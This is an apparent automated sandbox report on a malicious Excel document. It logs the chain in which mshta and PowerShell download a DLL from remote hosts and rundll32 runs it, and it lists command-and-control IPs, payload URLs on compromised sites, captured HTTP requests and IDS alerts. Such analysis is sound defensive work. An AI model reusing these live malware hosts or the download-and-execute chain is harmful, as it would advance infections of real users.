                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0035BAEA FindFirstFileW,

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80
                            Source: global trafficDNS query: name: tamiladsense.com
                            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

                            Networking

                            barindex
                            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                            Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 74.207.230.120 144
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 139.196.72.155 144
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorIPs: 74.207.230.120:8080
                            Source: Malware configuration extractorIPs: 139.196.72.155:8080
                            Source: Malware configuration extractorIPs: 37.44.244.177:8080
                            Source: Malware configuration extractorIPs: 37.59.209.141:8080
                            Source: Malware configuration extractorIPs: 116.124.128.206:8080
                            Source: Malware configuration extractorIPs: 217.182.143.207:443
                            Source: Malware configuration extractorIPs: 54.37.228.122:443
                            Source: Malware configuration extractorIPs: 203.153.216.46:443
                            Source: Malware configuration extractorIPs: 168.197.250.14:80
                            Source: Malware configuration extractorIPs: 207.148.81.119:8080
                            Source: Malware configuration extractorIPs: 195.154.146.35:443
                            Source: Malware configuration extractorIPs: 78.46.73.125:443
                            Source: Malware configuration extractorIPs: 191.252.103.16:80
                            Source: Malware configuration extractorIPs: 210.57.209.142:8080
                            Source: Malware configuration extractorIPs: 185.168.130.138:443
                            Source: Malware configuration extractorIPs: 142.4.219.173:8080
                            Source: Malware configuration extractorIPs: 118.98.72.86:443
                            Source: Malware configuration extractorIPs: 78.47.204.80:443
                            Source: Malware configuration extractorIPs: 159.69.237.188:443
                            Source: Malware configuration extractorIPs: 190.90.233.66:443
                            Source: Malware configuration extractorIPs: 104.131.62.48:8080
                            Source: Malware configuration extractorIPs: 62.171.178.147:8080
                            Source: Malware configuration extractorIPs: 185.148.168.15:8080
                            Source: Malware configuration extractorIPs: 54.38.242.185:443
                            Source: Malware configuration extractorIPs: 198.199.98.78:8080
                            Source: Malware configuration extractorIPs: 194.9.172.107:8080
                            Source: Malware configuration extractorIPs: 85.214.67.203:8080
                            Source: Malware configuration extractorIPs: 66.42.57.149:443
                            Source: Malware configuration extractorIPs: 185.148.168.220:8080
                            Source: Malware configuration extractorIPs: 103.41.204.169:8080
                            Source: Malware configuration extractorIPs: 128.199.192.135:8080
                            Source: Malware configuration extractorIPs: 195.77.239.39:8080
                            Source: Malware configuration extractorIPs: 59.148.253.194:443
                            Source: global trafficHTTP traffic detected: GET /ee/ss/se.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wp-includes/BEADvqGgemV8SnTX/ HTTP/1.1Host: tamiladsense.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveSet-Cookie: 61f44ecc07555=1643400908; expires=Fri, 28-Jan-2022 20:16:08 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:15:08 GMTExpires: Fri, 28 Jan 2022 20:15:08 GMTContent-Type: application/x-msdownloadContent-Disposition: attachment; filename="XrEtCt.dll"Content-Transfer-Encoding: binaryContent-Length: 557056Date: Fri, 28 Jan 2022 20:15:08 GMTData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: GET /ee/ss/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                            Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
                            Source: Joe Sandbox ViewIP Address: 104.131.62.48 104.131.62.48
                            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 74.207.230.120:8080
                            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 139.196.72.155:8080
                            Source: unknownNetwork traffic detected: IP country count 15
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3-fasen.c
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3-fasen.com/wp-content/3B
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3-fasen.com/wp-content/3Bl0hBbW/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://3-fasen.com/wp-content/3Bl0hBbW/PE3
                            Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.11
                            Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172
                            Source: DOCUMENT_2801.xls.0.drString found in binary or memory: http://91.240.118.172/ee/ss/se.html
                            Source: mshta.exe, 00000006.00000003.415186421.000000000314D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.htmlfunction
                            Source: mshta.exe, 00000006.00000003.414502711.0000000003145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.htmlhttp://91.240.118.172/ee/ss/se.html
                            Source: mshta.exe, 00000006.00000003.428424323.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.427844761.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412617394.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.433058972.00000000040DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.htmli
                            Source: mshta.exe, 00000006.00000002.429411187.000000000048E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.htmlngs
                            Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.p
                            Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.670073907.000000001B6A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.png
                            Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/ee/ss/se.pngPE3
                            Source: mshta.exe, 00000006.00000003.412876273.000000000053F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.430034442.000000000053F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.428162711.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.17f
                            Source: rundll32.exe, 0000000E.00000002.559655343.000000000032A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.11x
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                            Source: rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                            Source: rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://devbhoomigaushala.org/Get
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://engaz.sho
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://engaz.shop/wp-content/MOl
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://engaz.shop/wp-content/MOllqUm2nb/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://engaz.shop/wp-content/MOllqUm2nb/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://imaginariumstore.fun/ncsb
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK1
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/PE3
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                            Source: rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                            Source: rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://onexone.e
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://onexone.elementor.cloud/c
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/PE3
                            Source: rundll32.exe, 00000011.00000002.665515752.00000000038C0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tamiladsense.com
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tamiladsense.com/wp-inclu
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tunbridgeservices.com/jfo
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tunbridgeservices.com/jfoeqhxz/zOX0/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tunbridgeservices.com/jfoeqhxz/zOX0/PE3
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                            Source: powershell.exe, 00000008.00000002.663093888.0000000000277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                            Source: mshta.exe, 00000006.00000003.428385382.000000000405D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.428149840.0000000000530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
                            Source: rundll32.exe, 00000011.00000002.663342975.000000000047A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://139.196.72.155/
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://139.196.72.155/R
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEe
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://139.196.72.155:8080/LAeYVpeCtdnRcZsIKojYxnmOXJiyfTZboPIEXmAZEezOwG
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://74.207.230.120/O
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://74.207.230.120/d
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://74.207.230.120:8080/FdEJzcDerSgtVabAaMUkOcPkEPidYPfBmMvmzXVDJBNdJaXM
                            Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://74.207.230.120:8080/FdEJzcDerSgtVabAaMUkOcPkEPidYPfBmMvmzXVDJBNdJaXMcsv%lwG
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ecobaby.pi-dh.com/Serend
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lastregaristorante.com/w
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mypurealsystem.com/App_S
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mypurealsystem.com/App_Start/Rhh8lKO/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mypurealsystem.com/App_Start/Rhh8lKO/PE3
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oculusvisioncare.com/wp-
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/PE3
                            Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vn.minin
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vn.minino.com/wp-admin/c
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vn.minino.com/wp-admin/c3WQa/
                            Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vn.minino.com/wp-admin/c3WQa/PE3
                            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htmJump to behavior
                            Source: unknownDNS traffic detected: queries for: tamiladsense.com
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10012C30 _memset,connect,_strcat,send,recv,
                            Source: global trafficHTTP traffic detected: GET /ee/ss/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /ee/ss/se.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wp-includes/BEADvqGgemV8SnTX/ HTTP/1.1Host: tamiladsense.comConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 74.207.230.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 74.207.230.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 74.207.230.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: unknownTCP traffic detected without corresponding DNS query: 139.196.72.155
                            Source: mshta.exe, 00000006.00000003.428066381.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.429429555.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412759270.00000000004BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
